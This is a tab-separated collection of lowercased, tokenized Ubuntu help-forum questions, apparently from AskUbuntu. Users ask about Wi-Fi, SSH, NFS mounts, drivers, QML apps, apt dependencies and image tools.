492392	qml ca n't insert text into textinput	i have an textinput box and i ca n't insert text into it , i have tried everything i knew but still i could not put text into it , or even delete a text i have put on it . here is some of the code i have : rectangle { width : 40 ; height : 17 ; radius : 20.0 id : q1 x : 139 y : 47 color : `` # f0ebeb '' border.color : `` # 000000 '' textinput { text : `` 0 '' anchors.centerin : parent cursorvisible : true } }
492393	ubuntu 14.04 mouse pointer/cursor disappears when changing user	i have ubuntu 14.04 installed ( using unity ) and everything seems to work fine until i try to use a second user . once i click to log into another user it takes me back to the login screen and once it finishes drawing the cursor vanishes . after this point the only way to get it back is to use the arrow keys to reselect the already logged in user and log back in . if i log out of the first user the other user account seems to gets possession of the mouse . is there some setting to state that the mouse can not be claimed exclusively by one user ? this is most annoying when my nephew comes over and i have him use the guest account to surf the web . it only works if i make sure to sign out of the primary account before i leave for the day . it has does this since i upgrade from 13.10 . example : login screen ( has pointer ) login as tom ( has pointer ) switch back to login screen ( no pointer ) two possible use cases : 4.1 . user keyboard to login as tom ( pointer returns ) 4.2 . user keyboard to login as jerry ( no pointer ) same thing happens if you switch users jerry and tom from the above example . whoever logs in first seems to be exclusive rights to the mouse pointer ( mouse cursor ) and it does not get shared to any user after that .
492396	`` wi-fi disabled by hardware switch '' ( any chance for a permanent removal ? )	i have been looking around at forums and so on , and i know for a fact i am not the only one , and i actually have a temporary solution to my problem . when i 've done a full hard reboot of my laptop ( example : sudo reboot ) my wi-fi does not work , because it is disabled by hardware switch , or hard switch . whatever it 's called ! : p i have tried : rfkill list all , etc , and it works after i have selected the suspend option on my laptop , i just start up my laptop again and woopie ! i have wi-fi . i was wondering however , since the hardware switch shortcut does not work on ubuntu ( fn + f2 ) i was wondering if there 's any way for me to permanently remove the hardware switch , so i do n't have to suspend my laptop at all . i know my situation works , but it 's really lame that i just have to suspend my pc and relog in order to get wi-fi working . my computer model is a asus x552c . ps : i have tried to disable my bluetooth but the problem still persists ! thank you in advance !
492397	reading windows 8.1 files from the ubuntu 14.04 ?	i have tried to do these steps : http : //www.wikihow.com/access-windows-files-in-ubuntu but it did n't work . then i read here that deleting the hiberfile.sys will help , but it didnât also . instead , when i boot ubuntu , i get a error-message that was a mount error . how can i fix that and what is the right way to read windows files from ubuntu ?
492398	use pictures for an image object in qml for ubuntu touch	i 'm trying to use an image file from the main pictures directory ( /home/phablet/pictures ) for an animatedimage/image object however it says error reading file . i 've tried two paths already but neither worked . i know i can simply include the images in my application but i want to use different images on the go . thanks . animatedimage { id : gifvegeta anchors.fill : parent source : '/home/phablet/pictures/vegeta_charge.gif' //source : 'file : ///home/phablet/pictures/vegeta_charge.gif' }
492400	how to enter firmware setup tool after installing in legacy mode	i installed ubuntu following the steps in the linked question below except i used a live cd rather than a usb drive : stuck in grub rescue mode after installing ubuntu alongside windows 8 now i am trying to follow the steps in the answer . i burned a cd of refind as in step 1 but i can not enter the firmware setup tool . how do i go about `` setting a jumper to clear the nvram or temporarily unplugging the hard disk '' ? to be clear : i have tried the answer that is all over askubuntu to set prefix and root to the linux partition ( i verified this with `` ls '' ) run insmod i get a file not found message for both linux.mod and normal.mod also , rebooting with the live cd in the drive does nothing . rebooting with a windows usb recovery drive also does nothing .
492401	can i configure alienware led 's on ubuntu ?	if you have an alienware laptop , you might know you can change the color of the led 's , but i have some questions before i go ahead and install ubuntu . can i change the color of the led 's in seleral places on the laptop , and what packages do i need ? ( led 's can be found on the keyboard , trackpad , sides , and back ? ) can i make the led 's match the color of the screen at all times ? can i do a strobe light ? can i make it change slowly over time , and can i change the speed that the color shifts ? ( ex : changing the led 's so it changes from red to blue in 0.5 seconds instead of 5 . ) can i do any of these things on versions like kubuntu , xubuntu , lubuntu , ubuntu gnome , etc . can ubuntu do it on a clean install from cd ( assuming you just downloaded the official latest version , burnt it to a cd , fired it up , selected install , used the default settings , erased the whole drive , and did n't install any packages on the cd before installing , and , can i actually do this or will it fail and render the pc unbootable ( i tried it on my personal desktop , and it did render it unbootable , so i hat to call the it guy to get it working . ) please note : i did n't order the alienware yet , so i can not try these atm , sorry .
492402	sudo dpkg-reconfigure foo	many and many and many times i see sudo dpkg-reconfigure foo what is that ? seems to be configuration ? but what is the relation between that and .conf file ? is there any file which store this configuration . if you need example sudo dpkg-reconfigure postfix . i need some more description what i know is just it is for package configuration .
492403	how to uninstall all non-default software ?	i want to essentially reset ubuntu 14.04 to factory settings , but i want to keep my unity preferences and my python packages . i 'm thinking i should just uninstall all software that are n't factory installed . how would i go about doing this , or is there an alternative you suggest ?
492407	ca n't find inkscape in dash	according to the ubuntu software center , inkscape is installed but it does n't show up when searching for it in dash . i ca n't open it by associating an svg-file with it since it ca n't find it . i 've tried to un-install and reinstall it with no luck . what is wrong ? best regards anders
492409	why some user functions do n't get recognised by bash with sudo ?	initial conditions : i have defined a function and export it : myfunction ( ) { echo ok ; } export -f myfunction i have a simple bash file : test.sh # ! /bin/bash myfunction test ok with the current user : if i run : bash test.sh it works : ) does not work with sudo : but if i run in sudo : sudo bash test.sh i have the error : test.sh : ligne2 : myfunction : commande introuvable which means test.sh : line2 : myfunction : command not found question why my function does not work in sudo ? how it can work in sudo ? thank you very much : )
492416	how do i configure a preseed to continue on a specific error ?	i have a complex partman configuration that stops on a `` partman-auto-lvm/vg_create_error '' . when i hit `` continue '' i get a perfect working installation . how can i ignore this error ? is there any way to pre-script a `` continue '' answer ? i 've tried all of these : d-i partman-auto-lvm/vg_create_error error partman-base partman/exception_handler select d-i debconf/priority select critical d-i debconf/frontend select critical partman-lvm partman-lvm/lvcreate_vgnames select d-i partman/exception_handler select ignore d-i partman/exception_handler select continue partman-base partman/exception_handler select continue d-i partman/exception_handler seen false d-i partman/exception_handler_note seen false d-i partman/exception_handler unseen d-i partman/exception_handler_note unseen d-i partman-auto-lvm/vg_create_error error true d-i partman/exception_handler select true d-i debconf/button-continue text false none helped .
492417	ubuntu 14.04 is running slow compared to windows 7 on the same machine	i installed ubuntu 14 . 04 , i used to have windows 7 , it runs much slower now , especially with games like half life , totally lagged out . motherboard : geforce 6100pm-m2 . processor : amd athlon dual core 215 by 2 . ram : 4 gb ddr2 . vga : ati radeon hd 5000 series . hard drive 500 gb .
492418	lubuntu wifi help	ok . here 's the basics . -- -- older laptop , dell 600 . intel 2200 gb wireless card i believe . sees my router , wo n't take the wpa key . i 've done quite a bit of forum browsing and i noticed my channel is set to 0 . i have 1-11 available but ca n't seem to change it . any ideas would be helpful . thank you . sudo iwlist eth1 auth eth1 authentication capabilities : wpa wpa2 cipher-tkip cipher-ccmp current tkip countermeasures : yes current drop unencrypted : yes current authentication algorithm : current receive unencrypted eapol : no current roaming control : yes current privacy invoked : yes also ran sudo iwconfig lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11bg essid : off/any mode : managed frequency:2.462 ghz access point : not-associated bit rate:0 kb/s tx-power=20 dbm sensitivity=8/0 retry limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0
492420	ubuntu to ipad mini video transfer help . other answers not working	tried this method posted here : how to copy existing movie files on ipad to watch ? not working due to this error that pops up mid transfer : invalid apple file control data received would like to put videos onto my ipad for viewing . ubuntu version is : 13.10 saucy also have airdisk free but for some reason most converted mp4 files do not play in the program after transferring ... ipad does not show up in rythmbox . thanks in advance for all the help . i 'm not good at ubuntu so if you need more details just let me know what to do : )
492423	add a new partition to ubuntu and append it to /var/www/	i have installed an ubuntu server on a vmware workstation with a space of 20gb storage as seen below ; after the installation i 've attached another 40gb worth storage to the existing ubuntu server installation ( seen below ) ; now i want to add this 40gb to my / ( root ) directory or to /var/ directory but my df -h result shows ; root @ userver : ~ # df -h filesystem size used avail use % mounted on /dev/sda1 18g 900m 16g 6 % / udev 990m 4.0k 990m 1 % /dev tmpfs 400m 308k 399m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 999m 0 999m 0 % /run/shm none 100m 0 100m 0 % /run/user root @ userver : ~ # what should i do now ? further , i have only ssh access to the server .
492426	laptop touchpad is not working	i installed ubuntu 14.04 lts but it 's not recognizing touchpad of laptop . what can be caused to this ? here some outputs : xinput list output : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ 2.4g rx id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] synclient touchpadoff=0 output : could n't find synaptics properties . no synaptics driver loaded ?
492427	transfer file from ubuntu to android using scp	i am on my evo 3d rooted android device and using juicessh to ssh into my ubuntu 14.04 . i want to transfer some files from ubuntu to android . now after doing some research i found that good way to go is to use scp . so i run this command : if i run : sudo scp ubuntuusername @ ubuntuip : /home/username/somefile /sdcard/ i get error : /sdcard/ is a directory . now using official documentation i run like this : sudo scp /home/username/somefile ubuntuusername @ ubuntuip : /sdcard/ i get error : /sdcard/ is a directory . sudo scp /home/username/somefile ubuntuusername @ ubuntuip : / trying to copy to root i get asked to password , but it says scp : /temp : permission denied what i am doing wrong here ? i think it 's possible that sdcard is not mounted , maybe that 's the problem , but then why i can not send file to root dir ?
492429	mac with no internal hard drive/brokenefi and ubuntu	a few years ago i got an old mac ( 2009 version ) . i tried to fix it but i gave up after days of workimg . last week i tried it once again . it seems that there is no ( totally broken , i dont know ) hardd dive , the efi mode doesnt work really ( mouse and keyboard dont work , the gui looks really strange , difficult to describe , also a macos-cd couldn help at all ! ) i came trough with a ubuntu cd and installed it on my external hard drive . but now i have some problems , where i need our wisdom ! because efi seems to be broken i have to start with the ubuntucd and start from there the installed ubuntu on the external hard drive . when i try alt or something else . efi is totally unable to let me boot from my external ( wired graphics and no control over keyboard etc ) is there a way to install efi new or get a way around it ? ( like efi on the external ? ) from what i understand efi controls the fans , which makes sense , because they are also broken . they are always on fullspeed even when i just started the mac , even in efi , in ubuntu , in livecd ... how can i fix this ? ok the mac seems to get hot but it shouldnt listen like an airplane ... thx for your amazing work here ps : ubuntu 14.04 lts mac : http : //www.everymac.com/systems/apple/imac/specs/imac-core-2-duo-2.66-24-inch-aluminum-early-2009-specs.html
492430	when installing ubuntu , i get error message `` ? ? ? ? ? ? '' and can not install it	i 'm trying to install ubuntu but i keep getting these error messages and can not . i 'll attach images below . any help would be appreciated . thanks !
492432	is my windows booting in uefi mode or legacy mode ?	i want to install ubuntu beside win8 ( by this guide ) , but i do n't know if my windows booting in uefi mode or legacy mode ( and it 's important to this guid ( in the `` dual boot issues '' subtitle ) . so.. how do i know it ?
492435	how to download apt and all it 's dependencies ?	i 'm trying to download apt and all it 's dependencies so i can use dpkg to install apt offline . since you ca n't simply use apt-get download apt the approach i 've taken is trying to generate a list of dependencies which i can then manually use apt-get download package-name to retrieve . i 've tried these : apt-cache showpkg package-name source : how can i check dependency list for a deb package apt-cache depends packagename source : how to find top-level dependencies in a list of deb packages ? dpkg -i pkg-name1_version.deb source : how to find all dependent ( dependency walker ) packages before installing a .deb file ? they do n't work properly . i need a way to list not only the dependencies of apt , but also the dependency dependencies ; the entire tree . according to `` sudo apt-get install apt -- reinstall '' apt has 302 depenencies+sub-depenencies . the lists generated using the answers i 've found appear only to list the first level of dependencies , because they are too short .
492436	from 12.04 to 14.04	i am have been using 12.04 and i was thinking of upgrading to 14.04 . my question to you all is that once i upgrade to the above mentioned version , i will i be able to use the third party packages that i have install in 12.04 . for example different audio and video plugins , the different softwares and also i am running some .exe programs using wine , eg office or some modelling programs . please let me know if it is possible retain this features will upgrading or so i need to do it all over again . cheers ! ! !
492441	how to remotely use ubuntu software center	my sysadmin set up my work machine such that i do n't have root privilege but i can use ubuntu software center to install packages by providing my password . i login to that ubuntu machine remotely , and i 'd like to install some packages from the software center , how can i do this ? i tried `` software-center '' , which gives me the interface , but nothing happens when i click on `` install '' note : both machines involved are ubuntu machine . this post might help understand my situation , my sys-admin did the same thing . i do n't know how he/she implemented it . thank you in advance . my sys-admin say that the software-center can not go through x-forwarding , so i can not install via software center using ssh . but i will try the remote desktop thing . thank you all for inputs !
492447	how to run opengl games ?	i have old laptop , and i want to open some 3d games with not much requirements , but they say i have not opengl or they are going too slow . i didnât see any solution searching on google so i decided to make one ask here to find my solution . when i write lspci the output is : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 02:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 02:01.0 cardbus bridge : o2 micro , inc. cardbus bridge ( rev 21 ) 02:01.4 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) my graphic card are this : 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) i am runing : ( uname -a ) linux myname-latitude 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:02:19 utc 2014 i686 i686 i686 gnu/linux any idea for me to install intel drivers ? i know something of linux but my level is not high so , i will try my best .
492450	recovering from tty	using xubuntu 13.10 . some key combination -- maybe ctrl-alt-esc or something similar -- keeps throwing me into a full-screen tty . when that happens , how do i get back to xubuntu ? i can log in to the tty with my username and pw , but i do n't know how to return to my graphical session .
492451	i 'm with a problem com my gnome shell	i need to delete always folders and settings of gnome-shell , but i do n't know what folders i should delete . someone could help with this ?
492459	suddenly ca n't ssh ( connection refused ) , sshd service not recognized	i have ubuntu running on an old desktop as a local file server , and it 's been working fine for the last three months without me ever needing to touch it , however today i wanted to change some configuration , and found that i could not ssh to it ( connection refused ) . i plugged a keyboard and monitor into the box , and i could not even 'ssh localhost ' successfully ( connection refused ) . 'ps -aux | grep ssh ' shows only ssh-agent is running , and when i tried to restart the service , it said that sshd ( and just ssh , i tried that too ) was n't a recognized service . 'dpkg -l | grep ssh ' lists openssh-client , but not openssh-server . now , i assume i could probably install openssh-server and everything would be fine again , but i 'm quite confused as to what possibly could have caused this . dpkg.log makes no mention of openssh-server ever being installed , let alone uninstalled , which does n't make sense considering i 'd ssh 'd to the machine in the past just fine . is there some other package ubuntu comes with that would let me ssh to it ?
492464	commoncache.socket	i am very new to ubuntu and am copying a usb thumb drive to another . i have changed permissions and copied everything except a commoncache.socket file . i have read and write permission but when i try to copy it i get an error saying `` cant copy special file '' . is there any way around this ? thanks for your help .
492467	sound problems in ubuntu 14.04	i am having problems using my audio ports in ubuntu 14.04 . i didnt notice this before , because i use wireless speakers and they use a usb port . but today i tried to use my headphones and i heard horrible static and some kind of lag . i was listening to music on youtube at the time and i also saw that the video/music began to play at a faster rate . this was again confirmed when i listened to music on rythmbox and the same thing was happening . then i tried to listen to music via my monitor that is connected to my computer with a hdmi-cabel . the static was there too , making the music hard to recognize ... needless to say , it was unlistenable.. unless you like some really weird and crazy kind of music remixes . ; ) otherwise the sound works perfectly via usb . what can i do to fix this ? output of sudo lshw -c multimedia follows *-multimedia description : audio device product : advanced micro devices , inc. [ amd/ati ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:46 memory : f7e60000-f7e63fff *-multimedia description : audio device product : intel corporation vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:45 memory : f7f10000-f7f13fff best regards ! : )
492468	how can i fix the purple screen of death when trying ubuntu ( 14-04 , 32-bits ) from the livecd ?	i burned a live-cd of ubuntu 14.04 ( 32-bits ) and when i boot up the computer from the cd , it appears a purple frozen screen with a weird icon on the bottom . i think i 've pressed every key on the keyboard to try to reach a menu of something but nothing seems to work . most of the keys give me a `` beep '' sound when i press them . i have a 2007 computer running windows vista ( 32-bits ) .
492470	14.04 ubuntu black borders , black terminal	this problem is the same as described by : 13.10 - black borders , black terminal however , that solution does not work . so i do n't think it 's a duplicate . in fact , nothing listed in that answer helped .
492471	adjust time & date settings via teminal	how do i adjust the time & date manually via terminal ( cli ) on ubuntu 14.04 ?
492473	macbook 3.1 `` @ '' sign would not work	well i 've been working on my keyboard , and have been able to fix the 'fn ' key . but the ' @ ' is a pain in the ... to set . i 'm belgium so i have a azerty , and at the moment the ' @ ' key gives me a ' < ' , the rest works fine . can somebody please help me out here ? thx seppoh
492476	internal sd card reader not mounted/detected hp realtek rts5227	i recently installed ubuntu 14.04 on my hp envy m7-j020dx . the only problem i am currently having is that the internal sd card reader does not seem to be detected at all . i have tried to find a solution using google , but there was little to find on how to solve this problem , and the solutions i 've tried did not work . there is no external problem because everything works fine in windows 8 . fun fact : sd card is detected on the 14.04 live cd , but not otherwise . with and without the sd card in , df -h gives me the following result : filesystem size used avail use % mounted on /dev/sda5 154g 35g 112g 24 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 3,9g 4,0k 3,9g 1 % /dev tmpfs 792m 1,4m 791m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 3,9g 28m 3,9g 1 % /run/shm none 100m 32k 100m 1 % /run/user /dev/sda2 256m 102m 155m 40 % /boot/efi /home/ramzes/.private 154g 35g 112g 24 % /home/ramzes what did n't work : rebooting with the sd card in the reader sudo modprobe rts5139 sudo modprobe rts5229 ( fatal : module not found ) this this which left me fixing my partition types for the next 4 hours anything front page google discussing this topic some info kernel : linux envy 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux lspci -v output with card in : http : //pastebin.com/vehik10j - relevant bit ( possibly ) : 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5227 pci express card reader ( rev 01 ) subsystem : hewlett-packard company device 1965 flags : fast devsel , irq 19 memory at b1000000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-00-01-00-4c-e0-00 capabilities : [ 150 ] latency tolerance reporting capabilities : [ 158 ] l1 pm substates dmesg output : http : //pastebin.com/davuzg2g
492477	epson v33 perfection not working with 14.04	i recently upgraded to ubuntu 14.04 from 12.04 . my epson v33 perfection worked under 12.04 , but not any more . xsane find scanner : `` failed to start scanner : invalid argument '' . how do i fix this ? which argument is invalid ? hardware : lenovo g585 with amd 64-bit epson v33 perfection software : 0a34d3a9b9da6587e9d1a031e5bb0874 esci-interpreter-perfection-v330_0.2.0-1_amd64.deb b162b55f4fbd037b94489a26e51e0f0f iscan_2.29.3-1~usb0.1.ltdl7_amd64.deb bf7b9e108d8fc15b83726b19c706e8df iscan-data_1.29.0-2_all.deb xsane-0.998 package xsane-0.996 compiled with gtk-2.24.18
492479	how to get accurate colors and contrast in ubuntu ?	i just bought a couple of dell u2414h monitors , but i do n't think this has anything to do with the monitors . in windows the black levels are perfect , but in ubuntu the black levels are way off . using the test image found at lagom lcd test i can see all the squares using windows , but only down to 4 using ubuntu . why is that , why are the colors/contrast different ? hardware : nvidia gtx 770 dell u2414h , connected using displayport , srgb mode software : ubuntu 14.04 nvidia driver version 331.38
492480	how to compile and install jbe	help i just downloaded jbe ( java bytecode editor ) when i extracted it ( because it was in a zip file when i downloaded it ) it comes up with a folder named `` bin '' , a folder named `` src '' , versoion.txt , jbe.sh , jbe.bat and a copying.txt file . please how to compile , install , and run the application ? . i am using xubuntu 14.04
492482	matlab : command not found	i have successfully installed matlab 2012a on 12.04 lts , but i seem unable to execute any of the necessary commands to activate or run the program . when i navigate to my path_to_matlab/bin folder in terminal and try sudo ./activate_matlab.sh , the response is sudo : ./activate_matlab.sh : command not found . the same thing happens when i try to run matlab or any other script in the folder . i have read https : //help.ubuntu.com/community/matlab , but i could n't find anything there that helped . i 'm booting from a ssd that is running out of room so i installed matlab to a hdd , and i wonder if that might be causing the problem . results from ls -l as requested : -rw -- -- -- - 1 zac zac 22899 dec 29 2011 activate_matlab.sh -rw -- -- -- - 1 zac zac 22948 dec 29 2011 deactivate_matlab.sh -rw -- -- -- - 1 zac zac 18654 apr 16 2010 deploytool -rw -- -- -- - 1 zac zac 7731 dec 29 2011 engopts.sh drwx -- -- -- 1 zac zac 147456 jul 6 13:46 glnxa64 -rw -- -- -- - 1 zac zac 19 apr 16 2010 insttype.ini -rw -- -- -- - 1 zac zac 22057 jan 20 2012 lcdata_utf8.xml -rw -- -- -- - 1 zac zac 22307 jan 20 2012 lcdata.xml -rw -- -- -- - 1 zac zac 3601 apr 16 2010 lcdata.xsd -rw -- -- -- - 1 zac zac 13694 dec 29 2011 ldd -rw -- -- -- - 1 zac zac 2309 sep 20 2011 license.txt drwx -- -- -- 1 zac zac 4096 jul 6 13:35 m3iregistry -rw -- -- -- - 1 zac zac 55180 dec 29 2011 matlab -rw -- -- -- - 1 zac zac 7730 dec 29 2011 matopts.sh -rw -- -- -- - 1 zac zac 81155 dec 29 2011 mbuild -rw -- -- -- - 1 zac zac 8588 dec 29 2011 mbuildopts.sh -rw -- -- -- - 1 zac zac 29795 dec 29 2011 mcc -rw -- -- -- - 1 zac zac 52785 dec 29 2011 mex -rw -- -- -- - 1 zac zac 11637 dec 29 2011 mexext -rw -- -- -- - 1 zac zac 9333 dec 29 2011 mexopts.sh -rw -- -- -- - 1 zac zac 758 apr 16 2010 mw_mpiexec -rw -- -- -- - 1 zac zac 567 apr 16 2010 mw_smpd -rw -- -- -- - 1 zac zac 6455 dec 29 2011 optsetup.sh -rw -- -- -- - 1 zac zac 212 apr 16 2010 productroots drwx -- -- -- 1 zac zac 28672 jul 6 13:45 registry drwx -- -- -- 1 zac zac 0 jul 6 13:33 util -rw -- -- -- - 1 zac zac 531 apr 16 2010 worker
492488	reasizing partitions ( make it larger )	so i am dual-booting a windows 7 laptop and i started ubuntu with around 30 gb for small projects . now that i am starting to use ubuntu more than windows , i am starting to run out of room . i have seen some tutorials on making partitions larger but i had to manually partition mine because of some weird error ( i forgot what it was i did this a couple weeks ago ) . so i got gparted and it seems to work great ( have n't really messed with it yet ) but i want to know what partition do i mess with to make the space for ubuntu larger . ( manually doing this in the first place was stressful enough so i do n't want to guess ) .
492489	occasional artifacts when displaying characters	to summarize the answer : switching to proprietary drivers should work , but the artifacts disappeared for me even on the free drivers now . update : since switching back to the proprietary amd driver ( fglrx ) , i have n't seen these artifacts . occasionally i see artifacts instead of correctly rendered characters : for now i have only observed this in firefox . the characters become normal once i select the text . what 's the issue here and how can i solve it ? graphics card : amd radeon hd 7790 driver : radeon ( free ) - > now i 'm no fglrx and am not seeing the artifacts ( see the update )
492491	firefox glitched glyphs	when browsing with firefox , some pieces of text will randomly render with bizarre glyphs , which immediately go away if selected or some other action happens on the page or even outside of it . for example , the simple fact of taking this snapshot triggered the numbers to render normally : note that this can happen on any character , even simple ascii ones like in the pictures , and the glitched glyphs which appear instead of the correct ones are not always the same . i 'm on an up to date kubuntu 14.04 with noscript , flashblock , ghostery and adblock on firefox . i had to install some fonts to display korean characters previously , and i ca n't remember having this bug beforehand as requested , here 's the output of glxinfo | grep opengl : opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd cape verde opengl core profile version string : 3.1 ( core profile ) mesa 10.1.3 opengl core profile shading language version string : 1.40 opengl core profile context flags : ( none ) opengl core profile extensions : opengl version string : 3.0 mesa 10.1.3 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : < nothing here >
492495	unable to install gold linker	it seems i ca n't install gold linker for 13.10 anymore : $ sudo apt-get install binutils-gold reading package lists ... done building dependency tree reading state information ... done note , selecting 'binutils ' instead of 'binutils-gold' binutils is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 276 not upgraded i see this with lots of 'removal ' notices . wth ? i already tried apt-get update and does n't help edit the same problem happens with trusty ( 14.04 )
492496	adding nfs mounted file systems on ubuntu 14.04	is there something special that needs to be done to make sure nfs file systems are mounted at boot time with 14.04 ? i added some nfs mounts to /etc/fstab in a virtual server running ubuntu 14.04 , but when i rebooted the vm , it did not mount the file systems . i added the line : mount -vat nfs to rc.local , but that is a hack . do i need to do something else to let the system know it needs to mount some nfs file systems ? on centos machines , merely adding lines to /etc/fstab always works , but i am new to ubuntu and maybe i need to do some additional thing . the /etc/fstab file looks like this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/vda1 during installation uuid=ef6d9c40-9035-4452-b091-8b68d7a2cbee / ext4 errors=remount-ro 0 1 # swap was on /dev/vda5 during installation uuid=0da4579e-f3a9-4ab3-8818-0cc1cd559a8d none swap sw 0 0 192.168.1.251 : /home /home nfs rw , hard , intr , nfsvers=3 , tcp , ,defaults 0 0 192.168.1.251 : /distros /distros nfs ro , hard , intr , nfsvers=3 , tcp , ,defaults 0 0 192.168.1.251 : /var/spool/mail /var/spool/mail nfs rw , hard , intr , nfsvers=3 , tcp , ,defaults 0 0 newserver : /ubuntumirror /ubuntumirror nfs rw , hard , intr , nfsvers=3 , tcp , ,defaults 0 0 the host server is running centos 6.5 and yes , all of the nfs file systems are properly exported .
492498	what are the proper steps for downloading the latest version of ubuntu ? 14.04	/home/david/documents/ubuntu-14.04-desktop-amd64.iso this is the proper file save for my system requirements . this is saved currently under documents but the instructions on the website tell me to have a burned dvd or usb stick prepared . i assume this is only to avoid losing data . i 'm not concerned with losing data , i only wish to update quickly and safely . how to i begin the process once the downloaded file is saved ? thank you as always for all the valuable help !
492501	execute javascript code in oxide	i 'm looking for an oxide equivalence to this qtwebkit function : webview.experimental.evaluatejavascript ( ) or webkitgtk webview.execute_script ( ) i 'm having problems to find documentation about oxide . this article has good information but is not exactly what i 'm trying to do : http : //daker.me/2014/05/how-to-use-oxide-in-your-ubuntu-qml-application.html
492506	difference between apt-cacher and apt-cacher-ng	what exactly is the difference between apt-cacher and apt-cacher-ng ? i ca n't seem to find anywhere comparing the two . i 've found tutorials and manuals on both of them , and they seem to be the same from the set-up point of view . is one better or more reliable than the other ? does one offer services that the other does not ? what are the pros and cons of each ?
492507	what does it mean when i type a command and the terminal does nothing ?	i 'm new to linux ( i am running ubuntu ) . i am learning new commands for the terminal and even following some guides/forums on how to do stuff . sometimes i will type a command and the terminal makes a newline then sits with a blinking cursor after the last command i typed . sometimes i think the computer is just thinking and needs time to do something ( although it would be nice to have some sort of indication of the progress on the given task ) . sometimes the terminal progresses to let me type a new command and other times i wait a few minutes before pressing ctrl+c to stop whatever it was doing . it would be nice to know what i 'm dealing with here so i can judge better whether i am supposed to be waiting or just wasting my time .
492510	which package should i choose for the convert command ?	typing convert on my system ( 14.04 ) produces : the program 'convert ' can be found in the following packages : * imagemagick * graphicsmagick-imagemagick-compat why are there 2 packages providing the same command ? how do i figure out which one should i use ? follow-up i used im with command convert -layers optimize output*.png output.gif and this produced a file of size 25903 bytes out of my 222 frames . for the record the man page for im convert says : -layers method optimize or compare image layers for the sake of the test i uninstalled im , installed gm and tried the supposedly equivalent command gm convert -delay 10 output*.gif animation.gif . it created an animated gif file with exactly the same size but different md5sum . again , for the record the man page for gm convert does not mention option -layers . this is not a bug in gm , it is just a different way of doing things . i guess i will be sticking with gm since it seems to be more actively maintained .
